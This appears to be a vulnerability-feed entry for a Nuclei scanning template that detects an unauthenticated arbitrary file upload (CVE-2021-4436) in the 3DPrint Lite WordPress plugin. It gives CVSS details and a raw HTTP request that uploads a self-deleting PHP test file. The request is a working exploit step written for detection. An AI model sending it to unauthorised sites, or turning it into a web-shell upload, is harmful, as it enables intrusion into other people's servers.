nuclei | ProjectDiscovery | NUCLEI:CVE-2021-4436
History: Jun 24, 2024 - 1:55 p.m.

3DPrint Lite < 1.9.1.5 - Arbitrary File Upload

2024-06-24 13:55:44
ProjectDiscovery
github.com
Tags: cve, file upload, wordpress, wp-plugin, unauthenticated users, apache, security vulnerability

CVSS3: 9.8 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score: 7.1 High (Confidence: Low)
EPSS: 0.188 Low (Percentile: 96.3%)

The plugin does not perform any authorisation and does not check the uploaded file in its p3dlite_handle_upload AJAX action, allowing unauthenticated users to upload arbitrary files to the web server. However, a .htaccess file prevents the uploaded file from being accessed on web servers such as Apache.

id: CVE-2021-4436

info:
  name: 3DPrint Lite < 1.9.1.5 - Arbitrary File Upload
  author: securityforeveryone
  severity: critical
  description: |
    The plugin does not have any authorisation and does not check the uploaded file in its p3dlite_handle_upload AJAX action , allowing unauthenticated users to upload arbitrary file to the web server. However, there is a .htaccess, preventing the file to be accessed on Web servers such as Apache.
  remediation: Fixed in 1.9.1.5
  reference:
    - https://wpscan.com/vulnerability/c46ecd0d-a132-4ad6-b936-8acde3a09282/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-4436
    - https://github.com/fkie-cad/nvd-json-data-feeds
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-4436
    cwe-id: CWE-434
    epss-score: 0.00412
    epss-percentile: 0.73863
    cpe: cpe:2.3:a:wp3dprinting:3dprint_lite:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: wp3dprinting
    product: 3dprint_lite
    framework: wordpress
    publicwww-query: "/wp-content/plugins/3dprint-lite/"
  tags: cve,cve2021,3dprint-lite,file-upload,instrusive,wpscan,wordpress,wp-plugin,intrusive

variables:
  string: "{{randstr}}"
  filename: "{{to_lower(rand_text_alpha(5))}}"

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=---------------------------54331109111293931601238262353

        -----------------------------54331109111293931601238262353
        Content-Disposition: form-data; name="action"

        p3dlite_handle_upload
        -----------------------------54331109111293931601238262353
        Content-Disposition: form-data; name="file"; filename="{{filename}}.php"
        Content-Type: text/php

        <?php echo "{{string}}";unlink(__FILE__);?>
        -----------------------------54331109111293931601238262353--

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"jsonrpc":"2.0"'
          - '"filename":'
          - '{{filename}}.php'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a004730450220505cc213149b2b7ea3611ef5cd0bf0c1d786d34503427cfdbd6ccc0844710e430221008083729a34767882c976fc061ae7a9a6db2061f3de0036ea1c4da8ec263724cf:922c64590222798bb761d5b6d8e72950
